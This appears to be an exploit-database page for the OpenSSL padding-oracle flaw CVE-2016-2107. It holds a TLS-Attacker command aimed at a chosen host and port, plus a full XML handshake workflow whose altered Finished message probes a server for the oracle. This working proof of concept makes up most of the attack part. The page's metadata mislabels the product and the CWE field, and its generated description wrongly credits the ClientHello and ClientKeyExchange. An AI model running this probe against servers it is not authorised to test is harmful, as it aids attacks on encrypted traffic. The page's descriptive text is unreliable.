header-logo
Suggest Exploit
vendor:
TLS-Attacker
by:
web-in-security
5,9
CVSS
MEDIUM
Padding Oracle Attack
310
CWE
Product Name: TLS-Attacker
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: YES
Related CWE: CVE-2016-2107
CPE: TLS-Attacker
Metasploit: https://www.rapid7.com/db/vulnerabilities/pulse-secure-pulse-connect-secure-cve-2016-2107/https://www.rapid7.com/db/vulnerabilities/cisco-anyconnect-cve-2016-2107/https://www.rapid7.com/db/vulnerabilities/apple-osx-openssl-cve-2016-2107/https://www.rapid7.com/db/vulnerabilities/cisco-asa-cve-2016-2107/https://www.rapid7.com/db/vulnerabilities/oracle_linux-cve-2016-2107/https://www.rapid7.com/db/vulnerabilities/http-openssl-cve-2016-2107/https://www.rapid7.com/db/vulnerabilities/panos-cve-2016-2107/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2016-2107/https://www.rapid7.com/db/vulnerabilities/alpine-linux-cve-2016-2107/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2016-2107/https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2016-2107/https://www.rapid7.com/db/vulnerabilities/hpsmh-cve-2016-2107/https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2016-2107/https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2016-2107/https://www.rapid7.com/db/vulnerabilities/amazon_linux-cve-2016-2107/https://www.rapid7.com/db/vulnerabilities/debian-cve-2016-2107/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2016-2107/https://www.rapid7.com/db/vulnerabilities/suse-cve-2016-2107/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2016-0722/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2016-0996/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Java
2016

TLS-Attacker

TLS-Attacker is a tool that can be used to build a proof of concept and test implementations for the Padding Oracle Attack vulnerability. It is a Java-based tool that can be used to send a specially crafted ClientHello message to the server, which can then be used to decrypt the encrypted data. The xml configuration file (rsa-overflow.xml) contains the ClientHello message, which includes the supported cipher suites, compression methods, and elliptic curves. The ClientKeyExchange message also includes a flag to enable the padding oracle attack.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all TLS implementations are up to date and patched with the latest security updates.
Source

Exploit-DB raw data:

Source: http://web-in-security.blogspot.ca/2016/05/curious-padding-oracle-in-openssl-cve.html

TLS-Attacker:
https://github.com/RUB-NDS/TLS-Attacker
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39768.zip


You can use TLS-Attacker to build a proof of concept and test your implementation. You just start TLS-Attacker as follows:
java -jar TLS-Attacker-1.0.jar client -workflow_input rsa-overflow.xml -connect $host:$port

The xml configuration file (rsa-overflow.xml) looks then as follows:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<workflowTrace>
    <protocolMessages>
        <ClientHello>
            <messageIssuer>CLIENT</messageIssuer>
            <includeInDigest>true</includeInDigest>
            <extensions>
                <EllipticCurves>
                    <supportedCurvesConfig>SECP192R1</supportedCurvesConfig>
                    <supportedCurvesConfig>SECP256R1</supportedCurvesConfig>
                    <supportedCurvesConfig>SECP384R1</supportedCurvesConfig>
                    <supportedCurvesConfig>SECP521R1</supportedCurvesConfig>
                </EllipticCurves>
            </extensions>
            <supportedCompressionMethods>
                <CompressionMethod>NULL</CompressionMethod>
            </supportedCompressionMethods>
            <supportedCipherSuites>
                <CipherSuite>TLS_RSA_WITH_AES_128_CBC_SHA</CipherSuite>
                <CipherSuite>TLS_RSA_WITH_AES_256_CBC_SHA</CipherSuite>
                <CipherSuite>TLS_RSA_WITH_AES_128_CBC_SHA256</CipherSuite>
                <CipherSuite>TLS_RSA_WITH_AES_256_CBC_SHA256</CipherSuite>
            </supportedCipherSuites>
        </ClientHello>
        <ServerHello>
            <messageIssuer>SERVER</messageIssuer>
        </ServerHello>
        <Certificate>
            <messageIssuer>SERVER</messageIssuer>
        </Certificate>
        <ServerHelloDone>
            <messageIssuer>SERVER</messageIssuer>
        </ServerHelloDone>
        <RSAClientKeyExchange>
            <messageIssuer>CLIENT</messageIssuer>
        </RSAClientKeyExchange>
        <ChangeCipherSpec>
            <messageIssuer>CLIENT</messageIssuer>
        </ChangeCipherSpec>
        <Finished>
            <messageIssuer>CLIENT</messageIssuer>
            <records>
            <Record>
            <plainRecordBytes>
                <byteArrayExplicitValueModification>
                     <explicitValue>
  3F 3F 3F 3F 3F 3F 3F 3F  3F 3F 3F 3F 3F 3F 3F 3F
  3F 3F 3F 3F 3F 3F 3F 3F  3F 3F 3F 3F 3F 3F 3F 3F
                     </explicitValue>
                </byteArrayExplicitValueModification>
            </plainRecordBytes>
            </Record>
            </records>
        </Finished>
        <ChangeCipherSpec>
            <messageIssuer>SERVER</messageIssuer>
        </ChangeCipherSpec>
        <Finished>
            <messageIssuer>SERVER</messageIssuer>
        </Finished>
    </protocolMessages>
</workflowTrace>

It looks to be complicated, but it is just a configuration for a TLS handshake used in TLS-Attacker, with an explicit value for a plain Finished message (32 0x3F bytes). If you change the value in the Finished message, you will see a different alert message returned by the server.

Navigation

Suggest Exploit

Services By CQR